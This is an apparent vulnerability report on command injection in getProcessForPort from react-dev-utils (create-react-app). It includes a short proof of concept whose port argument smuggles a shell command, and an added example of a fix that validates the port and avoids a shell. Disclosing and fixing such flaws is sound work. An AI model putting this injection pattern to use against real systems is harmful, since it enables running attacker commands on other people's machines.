Command Injection in facebook/create-react-app
Valid
Reported on Mar 3rd 2021
Description
react-dev-utils includes some utilities used by Create React App.
The function getProcessForPort in react-dev-utils is vulnerable to command injection.
PoC
Create a .js file with the content below and run it. The file pzhou@shu is then created, which shows that the injected touch command was executed.
var getProcessForPort = require('react-dev-utils/getProcessForPort');
getProcessForPort('11;$(touch pzhou@shu)');
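One way to close this class of bug, shown as an added example that is not code from react-dev-utils or from the report: validate the port strictly and run the lookup tool without a shell. The function names, the use of lsof and its flags, and the concatenated command shape are assumptions made for illustration.

```javascript
// Added example: names and the lsof invocation are assumptions, not project code.
const { execFileSync } = require('child_process');

// Illustration only, never executed: the string a shell would be handed if the
// port were concatenated into a command line (assumed shape).
function concatenatedCommand(port) {
  return 'lsof -i:' + port + ' -P -t -sTCP:LISTEN';
}

// Accept only a decimal integer in the TCP port range; reject everything else.
function parsePort(value) {
  const text = String(value);
  if (!/^[0-9]{1,5}$/.test(text)) {
    throw new TypeError('port must be a decimal integer: ' + JSON.stringify(text));
  }
  const port = Number(text);
  if (port < 1 || port > 65535) {
    throw new RangeError('port out of range: ' + port);
  }
  return port;
}

// Build an argument vector; each element reaches lsof as one literal argument.
function lsofArgs(value) {
  return ['-i:' + parsePort(value), '-P', '-t', '-sTCP:LISTEN'];
}

// Run lsof directly, with no shell, so metacharacters are never interpreted.
function getPidsOnPort(value) {
  const args = lsofArgs(value); // throws on invalid input before anything runs
  try {
    const out = execFileSync('lsof', args, {
      encoding: 'utf8',
      stdio: ['ignore', 'pipe', 'ignore'],
    });
    return out.split('\n').filter(Boolean).map(Number);
  } catch (err) {
    return []; // lsof exits non-zero when nothing listens, or is not installed
  }
}
```

With this version the PoC input is rejected by parsePort before any process is started, and even a value that passed validation would reach lsof as a single argument rather than as shell text.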
Occurrences